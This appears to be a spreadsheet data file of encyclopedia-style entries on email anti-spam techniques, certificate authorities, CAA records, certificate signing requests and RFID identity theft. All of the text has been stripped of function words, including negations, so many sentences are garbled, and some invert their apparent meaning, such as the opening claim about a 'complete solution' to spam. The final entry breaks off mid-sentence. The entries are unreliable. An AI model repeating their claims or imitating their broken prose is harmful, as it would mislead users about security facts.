    <t>various anti-spam techniques used prevent email spam (unsolicited bulk email). technique complete solution spam problem, trade-offs incorrectly rejecting legitimate email (false positives) opposed rejecting spam email (false negatives) associated costs time, effort, cost wrongfully obstructing good mail.anti-spam techniques broken four broad categories: require actions individuals, automated email administrators, automated email senders employed researchers enforcement officials. end-user techniques there number techniques individuals restrict availability email addresses, goal reducing chance receiving spam. discretion sharing email address among limited group correspondents limit chance address "harvested" targeted spam. similarly, forwarding messages number recipients know another, recipient addresses "bcc: field" recipient list recipients' email addresses. address munging email addresses posted webpages, usenet chat rooms vulnerable e-mail address harvesting. address munging practice disguising e-mail address prevent automatically collected way, still allow human reader reconstruct original: email address "no-one@example.com", might written "no-one example com", instance. related technique display part email address image, jumbled text order characters restored using css. avoid responding spam common piece advice reply spam messages spammers simply regard responses confirmation email address valid. similarly, many spam messages contain links addresses user directed follow removed spammer's mailing list treated dangerous. case, sender addresses often forged spam messages, responding spam result failed deliveries reach completely innocent third parties. contact forms businesses individuals sometimes avoid publicising email address asking contact come "contact form" webpage typically forwards information email. such forms, however, sometimes inconvenient users, able preferred email client, risk entering faulty reply address, typically notified delivery problems. further, contact forms drawback require website appropriate technology. cases contact forms also send message email address given user. this allows contact form used sending spam, incur email deliverability problems site spam reported sending blacklisted. disable html email many modern mail programs incorporate browser functionality, display html, urls, images. avoiding disabling feature help avoid spam. may, however, useful avoid problems user opens spam message: offensive images, obfuscated hyperlinks, tracked bugs, targeted javascript attacks upon security vulnerabilities html renderer. mail clients automatically download display html, images attachments fewer risks, clients configured display default. disposable email addresses email user sometimes need give address site without complete assurance site owner sending spam. mitigate risk provide disposable email address address user disable abandon forwards email real account. number services provide disposable address forwarding. addresses manually disabled, expire given time interval, expire certain number messages forwarded. disposable email addresses used users track whether site owner disclosed address, security breach. passwords systems "ham passwords" unrecognised senders include email password demonstrates email message "ham" (not spam) message. typically email address password would described page, password would included subject line email message appended "username" part email address using "plus addressing" technique). passwords often combined filtering systems messages identified "ham". reporting spam tracking spammer's reporting offense lead spammer's service terminated criminal prosecution. unfortunately, difficult track spammer, online tools spamcop network abuse clearinghouse assist, always accurate. historically, reporting spam played large part abating spam, since spammers simply move operation another url, network addresses. many countries consumers also forward unwanted deceptive commercial email authorities, e.g. email address (spam uce.gov) maintained federal trade commission (ftc), similar agencies countries. automated techniques email administrators there large number applications, appliances, services, software systems email administrators reduce load spam systems mailboxes. general attempt reject "block"), majority spam email outright smtp connection stage. accept message, typically analyze content decide "quarantine" categorised spam. authentication number systems developed allow domain name owners identify email authorized. many systems list sites authorized send email behalf. after many proposals, spf, dkim dmarc widely supported growing adoption. while directly attacking spam, systems make much harder spoof addresses, common technique spammers also used phishing, types fraud email. challenge/response systems method used internet service providers, specialized services enterprises combat spam require unknown senders pass various tests messages delivered. these strategies termed "challenge/response systems". checksum-based filtering checksum-based filter exploits fact messages sent bulk, identical small variations. checksum-based filters strip everything might vary messages, reduce remains checksum, look checksum database distributed checksum clearinghouse collects checksums messages email recipients consider spam (some people button email client click nominate message spam); checksum database, message likely spam. avoid detected way, spammers sometimes insert unique invisible gibberish known hashbusters middle messages, make message unique checksum. country-based filtering some email servers expect never communicate particular countries receive great deal spam. therefore, country-based filtering technique blocks email certain countries. this technique based country origin determined sender's address rather trait sender. dns-based blacklists there large number free commercial dns-based blacklists, dnsbls allow mail server quickly look incoming mail connection reject listed there. administrators choose scores dnsbls, reflects different policies: list sites known emit spam; others list open mail relays proxies; others list isps known support spam. filtering most spam/phishing messages contain entice victims clicking thus, popular technique since early 2000s consists extracting urls messages looking databases spamhaus' domain block list (dbl), surbl, uribl. strict enforcement standards many spammers poorly written software unable comply standards legitimate control computer using send spam (zombie computer). setting tighter limits deviation standards accept, mail administrator reduce spam significantly also runs risk rejecting mail older poorly written configured servers. greeting delay sending server required wait received smtp greeting banner sends data. deliberate pause introduced receiving servers allow detect deny spam-sending applications wait receive banner. temporary rejection greylisting technique built fact smtp protocol allows temporary rejection incoming messages. greylisting temporarily rejects messages unknown senders mail servers using standard error codes. compliant mtas proceed retry delivery later, many spammers spambots not. downside legitimate messages first-time senders experience delay delivery. helo/ehlo checking 5321 says smtp server "may verify domain name argument ehlo command actually corresponds address client. however, verification fails, server must refuse accept message basis." systems can, however, configured refuse connections hosts give invalid helo example, helo fqdn address surrounded square brackets. refusing connections hosts give obviously fraudulent helo refusing accept email whose helo/ehlo argument resolve dnsinvalid pipelining several smtp commands allowed placed network packet "pipelined". example, email sent header, several smtp "rcpt commands might placed single packet instead packet "rcpt command. smtp protocol, however, requires errors checked everything synchronized certain points. many spammers send everything single packet since care errors efficient. some mtas detect invalid pipelining reject email sent way. nolisting email servers given domain specified prioritized list, records. nolisting technique simply adding record pointing non-existent server "primary" (i.e. lowest preference value) means initial mail contact always fail. many spam sources retry failure, spammer move next victim; legitimate email servers retry next higher numbered normal email delivered brief delay. quit detection smtp connection always closed quit command. many spammers skip step spam already sent taking time properly close connection takes time bandwidth. some mtas capable detecting whether connection closed correctly measure trustworthy system honeypots another approach simply creating imitation gives appearance open mail relay, imitation tcp/ip proxy server gives appearance open proxy. spammers probe systems open relays proxies find host attempt send mail wasting time resources, potentially, revealing information origin spam sending entity operates honeypot. such system simply discard spam attempts, submit dnsbls, store analysis entity operating honeypot enable identification spammer blocking. hybrid filtering spamassassin, policyd-weight others various tests spam, assign numerical score test. each message scanned patterns, applicable scores tallied total fixed value, message rejected flagged spam. ensuring single spam test flag message spam, false positive rate greatly reduced. outbound spam protection outbound spam protection involves scanning email traffic exits network, identifying spam messages taking action blocking message shutting source traffic. while primary impact spam spam recipients, sending networks also experience financial costs, wasted bandwidth, risk addresses blocked receiving networks. outbound spam protection stops spam, also lets system administrators track spam sources network remediate example, clearing malware machines become infected virus participating botnet. ptr/reverse checks records reverse used number things, including: most email mail transfer agents (mail servers) forward-confirmed reverse (fcrdns) verification valid domain name, "received:" trace header field. some email mail transfer agents perform fcrdns verification domain name given smtp helo ehlo commands. #strict enforcement standards helo/ehlo check domain names rdns likely dial-up users, dynamically assigned addresses, home-based broadband customers. since vast majority email originates computers spam, many mail servers also refuse email missing "generic" rdns names. forward confirmed reverse verification create form authentication valid relationship owner domain name owner network given address. while reliant infrastructure, known vulnerabilities, authentication strong enough used whitelisting purposes spammers phishers cannot usually bypass verification zombie computers forge domains. rule-based filtering content filtering techniques rely specification lists words regular expressions disallowed mail messages. thus, site receives spam advertising "herbal viagra", administrator might place phrase filter configuration. mail server would reject message containing phrase. header filtering looks header email contains information origin, destination content message. although spammers often spoof fields header order hide identity, make email look legitimate many spoofing methods detected, violation 5322 standard header formed also serve basis rejecting message. smtp callback verification since large percentage spam forged invalid sender ("from") addresses, spam detected checking "from" address valid. mail server verify sender address making smtp connection back mail exchanger address, creating bounce, stopping email sent. callback verification various drawbacks: since nearly spam forged return addresses, nearly callbacks innocent third party mail servers unrelated spam; when spammer uses trap address sender's address. receiving tries make callback using trap address mail from command, receiving mta's address blacklisted; finally, standard vrfy expn commands used verify address exploited spammers mail administrators enable them, leaving receiving smtp server effective validate sender's email address. smtp proxy smtp proxies allow combating spam real time, combining sender's behavior controls, providing legitimate users immediate feedback, eliminating need quarantine. spamtrapping spamtrapping seeding email address spammers find normal users not. email address used sender must spammer black listed. example, email address "spamtrap@example.org" placed source html site displayed page, human visitors website would spammers, hand, page scrapers bots harvest email addresses html source code would find address. when spammer later sends address spamtrap knows highly likely spammer take appropriate action. statistical content filtering statistical, bayesian, filtering requires administrative maintenance instead, users mark messages spam nonspam filtering software learns judgements. thus, matched user's needs, long users consistently mark/tag emails, respond quickly changes spam content. statistical filters typically also look message headers, considering content also peculiarities transport mechanism email. software programs implement statistical filtering include bogofilter, dspam, spambayes, assp, crm114, email programs mozilla mozilla thunderbird, mailwasher, later revisions spamassassin. tarpits tarpit server software intentionally responds extremely slowly client commands. running tarpit treats acceptable mail normally known spam slowly appears open mail relay, site slow rate spammers inject messages mail facility. depending server internet speed, tarpit slow attack factor around 500. many systems simply disconnect server respond quickly, eliminate spam. however, legitimate email systems also deal correctly delays. fundamental idea slow attack perpetrator waste time without significant success.an organization successfully deploy tarpit able define range addresses, protocols, ports deception. process involves router passing supported traffic appropriate server sent contacts sent tarpit. examples tarpits include labrea tarpit, honeyd, smtp tarpits, ip-level tarpits. collateral damage measures protect spam cause collateral damage. this includes: measures consume resources, server network.when mail server rejects legitimate messages, sender needs contact recipient channel.when legitimate messages relegated spam folder, sender notified this.if recipient periodically checks spam folder, cost time spam easy overlook legitimate messages.measures imposes costs third party server considered abuse result deliverability problems. automated techniques email senders there variety techniques email senders make sure send spam. failure control amount spam sent, judged email receivers, often cause even legitimate email blocked sender dnsbls. background checks users customers since spammer's accounts frequently disabled violations abuse policies, constantly trying create accounts. damage done isp's reputation source spam, many isps email providers captchas accounts verify real human registering account, automated spamming system. they also verify credit cards stolen accepting customers, check spamhaus project rokso list, background checks. confirmed opt-in mailing lists malicious person easily attempt subscribe another user mailing list harass them, make company organisation appear spamming. prevent this, modern mailing list management programs (such mailman, listserv, majordomo, qmail's ezmlm) support "confirmed opt-in" default. whenever email address presented subscription list, software send confirmation message address. confirmation message contains advertising content, construed spam itself, address added live mail list unless recipient responds confirmation message. egress spam filtering email senders typically type anti-spam checks email coming users customers inward email coming rest internet. this protects reputation, could otherwise harmed case infection spam-sending malware. limit email backscatter receiving server initially fully accepts email, later determines message spam non-existent recipient, generate bounce message back supposed sender. however, often case spam), sender information incoming email forged unrelated third party bounce message backscatter spam. reason generally preferable rejection incoming email happen smtp connection stage, error code, sending server still connected. case sending server report problem real sender cleanly. port blocking firewalls routers programmed allow smtp traffic (tcp port machines network supposed mail transfer agents send email. this practice somewhat controversial isps block home users, especially isps allow blocking turned upon request. email still sent computers designated smart hosts port smart hosts email submission port 587. port interception network address translation used intercept port (smtp) traffic direct mail server enforces rate limiting egress spam filtering. this commonly done hotels, cause email privacy problems, well making impossible starttls smtp-auth port submission port used. rate limiting machines suddenly start sending lots email well become zombie computers. limiting rate email sent around typical computer question, legitimate email still sent, large spam runs slowed manual investigation done. spam report feedback loops monitoring spam reports places spamcop, aol's feedback loop, network abuse clearinghouse, domain's abuse@ mailbox, etc., isps often learn problems seriously damage isp's reputation mail servers blacklisted. from field control both malicious software human spam senders often forged from addresses sending spam messages. control enforced smtp servers ensure senders correct email address from field outgoing messages. email users database user record email address. smtp server must check email address from field outgoing message address belongs user's credentials, supplied smtp authentication. from field forged, smtp error returned email client (e.g. "you email address trying send from"). strong agreements most isps webmail providers either acceptable policy (aup) terms service (tos) agreement discourages spammers using system allows spammer terminated quickly violations. legal measures from 2000 onwards, many countries enacted specific legislation criminalize spamming, appropriate legislation enforcement significant impact spamming activity. where legislation provides specific text bulk emailers must include, also makes "legitimate" bulk email easier identify. increasingly, anti-spam efforts co-ordination enforcement, researchers, major consumer financial service companies internet service providers monitoring tracking email spam, identity theft phishing activities gathering evidence criminal cases.analysis sites spamvertised given piece spam often followed domain registrars good results. solutions ongoing research several approaches proposed improve email system. cost-based systems since spamming facilitated fact large volumes email inexpensive send, proposed solutions would require senders cost order send email, making prohibitively expensive spammers. anti-spam activist daniel balsam attempts make spamming less profitable bringing lawsuits spammers. machine-learning-based systems artificial intelligence techniques deployed filtering spam emails, artificial neural networks algorithms bayesian filters. these methods probabilistic methods train networks, examination concentration frequency words seen spam versus legitimate email contents. other techniques channel email proposal sending email attempts distribute anti-spam activities forcing verification (probably using bounce messages back-scatter occur) first email sent contacts. research conferences spam subject several research conferences, including: trec references external links aol's postmaster page describing anti-spam technical alliance (asta) proposal anti-spam research group wiki, created asrg still alive anti spam info resource page federal trade commission (ftc) caube.au fight spam australia, coalition against unsolicited bulk email, australia composing abuse reports send, send send send computer incident advisory committee's suggestions: e-mail spamming countermeasures: detection prevention e-mail spamming (shawn hernan, james cutler david harris) historical development spam fighting relation threat computer-aware criminals, public safety neil schwartzman. anti-spam guide, protect spam mail ddos attacks mail delivery messages backscatter spam laws united states, european union, countries' laws pending legislation regarding unsolicited commercial email. secret stopping spam article spam scientific american</t>
  </si>
  <si>
    <t>Certification on demand</t>
  </si>
  <si>
    <t>certification demand refers process digital certificates issued electronic signature creation device already sent hands customer. sources rossnagel, heiko. "mobile qualified electronic signatures certification demand" (pdf). wiiw.de.</t>
  </si>
  <si>
    <t>Certification Practice Statement</t>
  </si>
  <si>
    <t>certification practice statement (cps) document certificate authority member trust describes practice issuing managing public certificates.some elements include documenting practices issuance publication archiving revocation renewalby detailing practice issuance, revocation renewal, aids entities judging relative reliability given certificate authority. certificate authorities certificate authority, derive organization's certificate policy referenced issued certificates. trust because individuals certifiers trust, individual documents sometimes used. example, wot, might state certifying entity checked forms legal government signing person's public key. digital signatures when verifying digital signatures, necessary review determine meaning issuance certificate certifying entity. references external links microsoft.com "creating certificate policies certificate practice statements" security policy example trust: http://www.grep.be/gpg/cert-policy-v2</t>
  </si>
  <si>
    <t>Certification Authority Authorization</t>
  </si>
  <si>
    <t>certification authority authorization (caa) internet security policy mechanism allows domain name holders indicate certificate authorities whether authorized issue digital certificates particular domain name. means "caa" domain name system (dns) resource record. drafted computer scientists phillip hallam-baker stradling response increasing concerns security publicly trusted certificate authorities. internet engineering task force (ietf) proposed standard. background series incorrectly issued certificates 2001 onwards damaged trust publicly trusted certificate authorities, accelerated work various security mechanisms, including certificate transparency track mis-issuance, http public pinning dane block mis-issued certificates client-side, block mis-issuance certificate authority side.the first draft written phillip hallam-baker stradling, submitted ietf internet draft october 2010. this progressively improved pkix working group, approved iesg 6844, proposed standard, january 2013. ca/browser forum discussion began shortly afterward, march 2017 voted favor making implementation mandatory certificate authorities september 2017. least certificate authority, comodo, failed implement deadline. 2017 study technical university munich found many instances certificate authorities failed correctly implement part standard.in september 2017, jacob hoffman-andrews submitted internet draft intended simplify standard. this improved lamps working group, approved 8659, proposed standard, november 2019.as january 2020, qualys reports still, 6.8% 150,000 popular tls-supporting websites records. record certificate authorities implementing perform lookup resource records, found, ensure listed authorized party issuing digital certificate. each resource record consists following components: flag flags byte implements extensible signaling system future use. 2018, issuer critical flag defined, instructs certificate authorities must understand corresponding property issuing certificate. this flag allows protocol extended future mandatory extensions, similar critical extensions x.509 certificates. following property: issue this property authorizes holder domain specified associated property value issue certificates domain property published. issuewild this property acts like issue authorizes issuance wildcard certificates, takes precedence issue property wildcard certificate requests. iodef this property specifies method certificate authorities report invalid certificate requests domain name holder using incident object description exchange format. 2018, certificate authorities support tag, guarantee certificate issuances reported. contactemail increasingly, contact information available whois concerns potential gdpr violations. this property allows domain holders publish contact information dns. contactphone above, phone numbers.value value associated chosen property tag.the lack records authorizes normal unrestricted issuance, presence single blank issue disallows issuance.third parties monitoring certificate authority behavior might check newly issued certificates domain's records. 8659 states; records used certificate evaluators possible indicator security policy violation. such should take account possibility published records changed time certificate issued time certificate observed certificate evaluator. extensions 8657 specifies "accounturi" "validationmethods" parameters allow users specify desired methods domain control validation defined acme protocol. example, website administrator bind domain control particular account registered desired certification authority. history draft first extension standard published october 2016, proposing account-uri token issue property, ties domain specific automated certificate management environment account. this amended august 2017, also include validation-methods token, ties domain specific validation method, amended june 2018 remove hyphen account-uri validation-methods making instead accounturi validationmethods. examples indicate certificate authority identified ca.example.net authorized issue certificates example.com subdomains, record: example.com. issue "ca.example.net" disallow certificate issuance, allow issuance empty issuer list: example.com. issue indicate certificate authorities report invalid certificate requests email address real-time inter-network defense endpoint: example.com. iodef "mailto:security@example.com" example.com. iodef "http://iodef.example.com/" future extension protocol, example, defines future property, needs understood certificate authority safely proceed, issuer critical flag: example.com. issue "ca.example.net" example.com. future "value" known compliance incidents 2017, camerfirma found improperly validate records. camerfirma claimed misunderstood ca/browser forum baseline requirements describing validation.in early 2020, let's encrypt disclosed software improperly queried validated records potentially affecting million certificates. let's encrypt worked customers site operators replace million certificates, decided revoke rest avoid client downtime since affected certificates would expire less days. also certificate authority compromise certificate transparency dns-based authentication named entities http public pinning list record types references external links 8659 list identifiers records common database</t>
  </si>
  <si>
    <t>Wireless identity theft</t>
  </si>
  <si>
    <t>wireless identity theft, also known contactless identity theft rfid identity theft, form identity theft described "the compromising individual’s personal identifying information using wireless (radio frequency) mechanics." numerous articles written wireless identity theft broadcast television produced several investigations phenomenon. according marc rotenberg electronic privacy information center, wireless identity theft serious issue contactless (wireless) card design inherently flawed, increasing vulnerability attacks. overview wireless identity theft relatively technique gathering individuals' personal information rf-enabled cards carried person access control, credit, debit, government issued identification cards. each cards carry radio frequency identification chip responds certain radio frequencies. when "tags" come contact radio waves, respond slightly altered signal. response contain encoded personally identifying information, including card holder's name, address, social security number, phone number, pertinent account employee information.upon capturing ‘harvesting’) data, able program cards respond identical fashion (‘cloning’). many websites dedicated teaching people this, well supplying necessary equipment software.the financial industrial complex migrating magnetic stripes debit credit cards technically require swipe magnetic card swipe reader. number transactions minute increased, transactions processed shorter time, therefore making arguably shorter lines cashier. controversies academic researchers ‘white-hat’ hackers analysed documented covert theft rfid credit card information denials criticisms rfid card-issuing agencies. nevertheless, public disclosure information could stolen low-cost jerry-rigged detectors used scan cards mailing envelopes (and studies also even drive-by data attacks), design security features various cards upgraded remove card owners’ names data. additionally, number completely unencrypted card designs converted encrypted data systems. report issues raised 2006 report importance tens millions cards already issued. credit debit card data could stolen special cost radio scanners without cards physically touched removed owner's pocket, purse carry bag. among findings 2006 research study "vulnerabilities first-generation rfid-enabled credit cards", reports white-hat hackers: scanned credit cards revealed owners’ names, card numbers expiration dates; short maximum scanning distance cards tags (normally measured inches centimetres) could extended several feet technological modifications; even without range-extension technologies, black hatters walking crowded venues delivering fliers could easily capture card data individuals mail envelopes; security experts reviewed study findings startled breaches privacy study (conducted 2006); e-systems, exxon mobil’s speedpass keychain payment device, used weak encryption methods could compromised half-hour computing time; cards’ scanned stolen data quickly yielded actual credit card numbers data tokens; data illicitly obtained cards successfully used trick regular commercial card-reader (used study group) accepting purchase transactions online store require entry cards’ validation codes; higher level security systems continue developed, available rfid credit cards, actual banks decide much security want deploy cardholders; every cards tested study defeated least attacks researchers deployed; another related security threat concerned different product: government issued epassports (passports incorporate rfid tags similar credit debit cards). rfid tags epassports also subject data theft cloning attacks. united states government issuing epassports since 2006.in related issue, privacy groups individuals also raised "big brother" concerns, threat individuals aggregated information even tracking movements either card issuing agencies, third party entities, even governments. industry observers stated ‘...rfid certainly potential invasive consumer technology ever.’credit card issuing agencies issued denial statements regarding wireless identity theft fraud provided marketing information either directly criticized implied that: beyond card data itself, data protection anti-fraud measures payment systems place protect consumers; academic study conducted 2006 used sample rfid cards, accurately representative general rfid marketplace generally used higher security tested cards; unencrypted plain text information cards "...basically useless" itself), since financial transactions tied used verifications systems powerful encryption technologies; even consumers victims rfid credit card fraud identity theft, would financially liable credit card fraud marketing strategy ignores serious consequences card holders they've associated fraudulent transactions identity stolen);after release study results, credit card companies contacted york times' investigative report said removing card holder names data transmitted second generation rfid cards. compromised u.s. identification documents certain official identification documents issued u.s. government, u.s. passports, passport cards, also enhanced driver's licenses issued states york washington, contain rfid chips purpose assisting policing u.s. border. various security issues identified use, including ability black hats harvest identifier numbers distance apply blank counterfeit documents cards, thus assuming people's identifiers.various issues potential issues identified, including privacy concerns. although rfid identifier number associated document supposed include personal identification information, "...numbers evolve time, uses evolve time, eventually things reveal information initially expect" stated tadayoshi kohno, assistant professor computer science, university washington participated study government issued documents. also identity theft rfid global credit card fraud references further reading gannsle, daniel (december 2008), "how protect yourself high-tech rfid identity theft", just about everything. herrigel, alexander; zhao, jian (2006-02-09), renesse, rudolf (ed.), "rfid identity theft countermeasures, optical security counterfeit deterrence techniques vi", proceedings spie, harvard (6075): 366–379, bibcode:2006spie.6075..366h, doi:10.1117/12.643310, s2cid 62157071. markoff, john (march 2006), "study says chips tags vulnerable viruses", york times, retrieved 2009-03-14 deliberately corrupted rfid tags could introduce viruses computer systems). seltzer, larry (2009-02-20), "exposing myth passport card security", eweek, retrieved 2009-03-14.</t>
  </si>
  <si>
    <t>Certificate-based encryption</t>
  </si>
  <si>
    <t>certificate-based encryption system certificate authority uses id-based cryptography produce certificate. this system gives users implicit explicit certification, certificate used conventional certificate (for signatures, etc.), also implicitly purpose encryption. example user alice doubly encrypt message using another user's (bob) public (bob's) identity. this means user (bob) cannot decrypt without currently valid certificate also certificate authority cannot decrypt message user's private (i.e., implicit escrow id-based cryptography, double encryption means cannot decrypt solely information have).certificate trust parties. revocation revocation added system requiring certificate issued frequently level security requires. because certificate "public information", need transmitted secret channel. downside requirement regular communication users certificate authority, means certificate authority vulnerable electronic attacks (such denial-of-service attacks) also attacks could effectively stop system working. this risk partially completely reduced hierarchy multiple certificate authorities. practical applications best example practical certificate-based encryption content scrambling system (css), used encode movies make playable part world sold. however, fact region decryption stored hardware level players substantially weakens form protection. also x.509 certificate server references craig gentry, certificate-based encryption certificate revocation problem, lecture notes computer science, 293, 2003 [1]. whatsapp end-to-end data encryption</t>
  </si>
  <si>
    <t>Certificate signing request</t>
  </si>
  <si>
    <t>public infrastructure (pki) systems, certificate signing request (also certification request) message sent applicant certificate authority public infrastructure order apply digital identity certificate. usually contains public certificate issued, identifying information (such domain name) integrity protection (e.g., digital signature). common format csrs pkcs specification; another signed public challenge spkac format generated browsers. procedure before creating csr, applicant first generates pair, keeping private secret. contains information identifying applicant (such distinguished name case x.509 certificate) must signed using applicant's private key. also contains public chosen applicant. accompanied credentials proofs identity required certificate authority, certificate authority contact applicant information. typical information required (sample column sample x.509 certificate). note often alternatives distinguished names (dn), preferred value listed. request successful, certificate authority send back identity certificate digitally signed using private certificate authority. structure certification request consists three main parts: certification request information, signature algorithm identifier, digital signature certification request information. first part contains significant information, including public key. signature requester prevents entity requesting bogus certificate someone else's public key. thus private needed produce, part csr.csr personal certificates signing certificates must email address holder name organisation case business first part, asn.1 type certificationrequestinfo, consists version number (which known versions, 1.0, 1.5, specifications), subject name, public (algorithm identifier string), collection attributes providing additional information subject certificate. attributes contain required certificate extensions, challenge-password restrict revocations, well additional information subject certificate, possibly including local future types. example pkcs#10 standard defines binary format encoding csrs x.509. expressed asn.1. here example examine asn.1 structure using openssl: openssl asn1parse your_request represented base64 encoded pkcs#10; example given below: certificate signing request's asn.1 structure parsed openssl) appears following, first number byte offset, d=depth, hl=header length current type, l=length content: 0:d=0 hl=4 cons: sequence 4:d=1 hl=4 cons: sequence 8:d=2 hl=2 prim: integer 11:d=2 hl=3 cons: sequence 14:d=3 hl=2 cons: 16:d=4 hl=2 cons: sequence 18:d=5 hl=2 prim: object :countryname 23:d=5 hl=2 prim: printablestring 27:d=3 hl=2 cons: 29:d=4 hl=2 cons: sequence 31:d=5 hl=2 prim: object :stateorprovincename 36:d=5 hl=2 prim: utf8string :none 42:d=3 hl=2 cons: 44:d=4 hl=2 cons: sequence 46:d=5 hl=2 prim: object :localityname 51:d=5 hl=2 prim: utf8string :none 57:d=3 hl=2 cons: 59:d=4 hl=2 cons: sequence 61:d=5 hl=2 prim: object :organizationname 66:d=5 hl=2 prim: utf8string :wikipedia 77:d=3 hl=2 cons: 79:d=4 hl=2 cons: sequence 81:d=5 hl=2 prim: object :organizationalunitname 86:d=5 hl=2 prim: utf8string :none 92:d=3 hl=2 cons: 94:d=4 hl=2 cons: sequence 96:d=5 hl=2 prim: object :commonname 101:d=5 hl=2 prim: utf8string :*.wikipedia.org 118:d=3 hl=2 cons: 120:d=4 hl=2 cons: sequence 122:d=5 hl=2 prim: object :emailaddress 133:d=5 hl=2 prim: ia5string :none@none.com 148:d=2 hl=4 cons: sequence 152:d=3 hl=2 cons: sequence 154:d=4 hl=2 prim: object :rsaencryption 165:d=4 hl=2 prim: null 167:d=3 hl=4 prim: string 442:d=2 hl=2 cons: cont 444:d=1 hl=2 cons: sequence 446:d=2 hl=2 prim: object :md5withrsaencryption 457:d=2 hl=2 prim: null 459:d=1 hl=4 prim: string this generated supplying base64 encoding command openssl asn1parse your_request -inform stands privacy-enhanced mail describes encoding asn.1 distinguished encoding rules base64. also spkac x.509 references</t>
  </si>
  <si>
    <t>Certificate server</t>
  </si>
  <si>
    <t>cryptography, certificate authority certification authority (ca) entity stores, signs, issues digital certificates. digital certificate certifies ownership public named subject certificate. this allows others (relying parties) rely upon signatures assertions made private corresponds certified public key. acts trusted third party—trusted subject (owner) certificate party relying upon certificate. format certificates specified x.509 standard. particularly common certificate authorities sign certificates used https, secure browsing protocol world wide web. another common issuing identity cards national governments electronically signing documents. overview trusted certificates used create secure connections server internet. certificate essential order circumvent malicious party happens route target server acts target. such scenario commonly referred man-in-the-middle attack. client uses certificate authenticate signature server certificate, part authorizations launching secure connection. usually, client software—for example, browsers—include trusted certificates. this makes sense, many users need trust client software. malicious compromised client skip security check still fool users believing otherwise. clients server supervisors call certificate servers bestow users. commercial charge money issue certificates, customers anticipate ca's certificate contained within majority browsers, safe connections certified servers work efficiently out-of-the-box. quantity internet browsers, devices applications trust particular certificate authority referred ubiquity. mozilla, non-profit business, issues several commercial certificates products. while mozilla developed policy, ca/browser forum developed similar guidelines trust. single certificate shared among multiple resellers. root certificate base issue multiple intermediate certificates varying validation requirements. addition commercial cas, non-profits issue publicly-trusted digital certificates without charge, example let's encrypt. some large cloud computing hosting companies also publicly-trusted issue certificates services hosted infrastructure, example amazon services, cloudflare, google cloud platform. large organizations government bodies pkis (public infrastructure), containing cas. site using self-signed certificates acts commercial banks issue payment cards governed certificate authority, payment schemes route payment transactions initiated point sale terminals (pos) card issuing bank transfer funds card holder's bank account payment recipient's bank account. each payment card presents along card data also card issuer certificate pos. issuer certificate signed certificate. retrieves public storage, validates issuer certificate authenticity payment card sending payment request payment scheme. browsers clients sorts characteristically allow users away certificates will. while server certificates regularly last relatively short period, certificates extended, repeatedly visited servers, less error-prone importing trusting issued, rather confirm security exemption time server's certificate renewed. less often, trustworthy certificates used encrypting signing messages. dispense end-user certificates too, used s/mime. however, encryption entails receiver's public and, since authors receivers encrypted messages, apparently, know another, usefulness trusted third party remains confined signature verification messages sent public mailing lists. providers worldwide, certificate authority business fragmented, national regional providers dominating home market. this many uses digital certificates, legally binding digital signatures, linked local law, regulations, accreditation schemes certificate authorities. however, market globally trusted tls/ssl server certificates largely held small number multinational companies. this market significant barriers entry technical requirements. while legally required, providers choose undergo annual security audits (such webtrust certificate authorities north america etsi europe) included trusted root browser operating system. august 2020, root certificates, representing organizations, trusted mozilla firefox browser, root certificates, representing organizations, trusted macos, root certificates, representing organizations, trusted microsoft windows. android (jelly bean), android currently contains updated release.on november 2014, group companies nonprofit organizations, including electronic frontier foundation, mozilla, cisco, akamai, announced let's encrypt, nonprofit certificate authority provides free domain validated x.509 certificates well software enable installation maintenance certificates. let's encrypt operated newly formed internet security research group, california nonprofit recognized federally tax-exempt.according netcraft 2015, industry standard monitoring active certificates, "although global [tls] ecosystem competitive, dominated handful major three certificate authorities (symantec, comodo, godaddy) account three-quarters issued [tls] certificates public-facing servers. spot held symantec verisign purchased symantec) ever since [our] survey began, currently accounting third certificates. illustrate effect differing methodologies, amongst million busiest sites symantec issued valid, trusted certificates significantly overall market share."in 2020, according independent survey company netcraft, "digicert world's largest high-assurance certificate authority, commanding extended validation certificate market, organization-validated certificates globally.as july 2022 survey company w3techs, collects statistics certificate authority usage among alexa million tranco million websites, lists largest authorities absolute usage share below. validation standards commercial issue bulk certificates https servers typically technique called "domain validation" authenticate recipient certificate. techniques used domain validation vary cas, general domain validation techniques meant prove certificate applicant controls given domain name, information applicant's identity. many certificate authorities also offer extended validation (ev) certificates rigorous alternative domain validated certificates. extended validation intended verify control domain name, additional identity information included certificate. some browsers display additional identity information green bar. limitation solution weaknesses domain validation attackers could still obtain domain validated certificate victim domain, deploy attack; occurred, difference observable victim user would absence green company name. there question whether users would likely recognise absence indicative attack progress: test using internet explorer 2009 showed absence ie7's warnings noticed users, however microsoft's current browser, edge, shows significantly greater difference domain validated certificates, domain validated certificates hollow, grey lock. validation weaknesses domain validation suffers certain structural security limitations. particular, always vulnerable attacks allow adversary observe domain validation probes send. these include attacks dns, tcp, protocols (which lack cryptographic protections tls/ssl), compromise routers. such attacks possible either network near near victim domain itself. common domain validation techniques involves sending email containing authentication token link email address likely administratively responsible domain. this could technical contact email address listed domain's whois entry, administrative email like admin@, administrator@, webmaster@, hostmaster@ postmaster@ domain. some certificate authorities accept confirmation using root@, info@, support@ domain. theory behind domain validation legitimate owner domain would able read emails sent administrative addresses. domain validation implementations sometimes source security vulnerabilities. instance, security researchers showed attackers could obtain certificates webmail sites willing email address like ssladmin@domain.com domain.com, webmail systems reserved "ssladmin" username prevent attackers registering it.prior 2011, standard list email addresses could used domain validation, clear email administrators addresses needed reserved. first version ca/browser forum baseline requirements, adopted november 2011, specified list addresses. this allowed mail hosts reserve addresses administrative use, though precautions still universal. january 2015, finnish registered username "hostmaster" finnish version microsoft live able obtain domain-validated certificate live.fi, despite owner domain name. issuing certificate issues digital certificates contain public identity owner. matching private made available publicly, kept secret user generated pair. certificate also confirmation validation public contained certificate belongs person, organization, server entity noted certificate. ca's obligation schemes verify applicant's credentials, users relying parties trust information issued certificate. variety standards tests essence, certificate authority responsible saying "yes, person are, certify that".if user trusts verify ca's signature, also assume certain public indeed belong whoever identified certificate. example public-key cryptography used encrypt data communicated parties. this typically happen user logs site implements http secure protocol. example suppose user logs bank's homepage www.bank.example online banking. when user opens www.bank.example homepage, receive public along data web-browser displays. public could used encrypt data client server safe procedure protocol determines temporary shared symmetric encryption key; messages exchange protocol enciphered bank's public bank server private read them.the rest communication proceeds using (disposable) symmetric key, user enters information bank's page submits page (sends information back bank) data user entered page encrypted browser. therefore, even someone access (encrypted) data communicated user www.bank.example, eavesdropper cannot read decipher this mechanism safe user sure bank browser. user types www.bank.example, communication hijacked fake website (that pretends 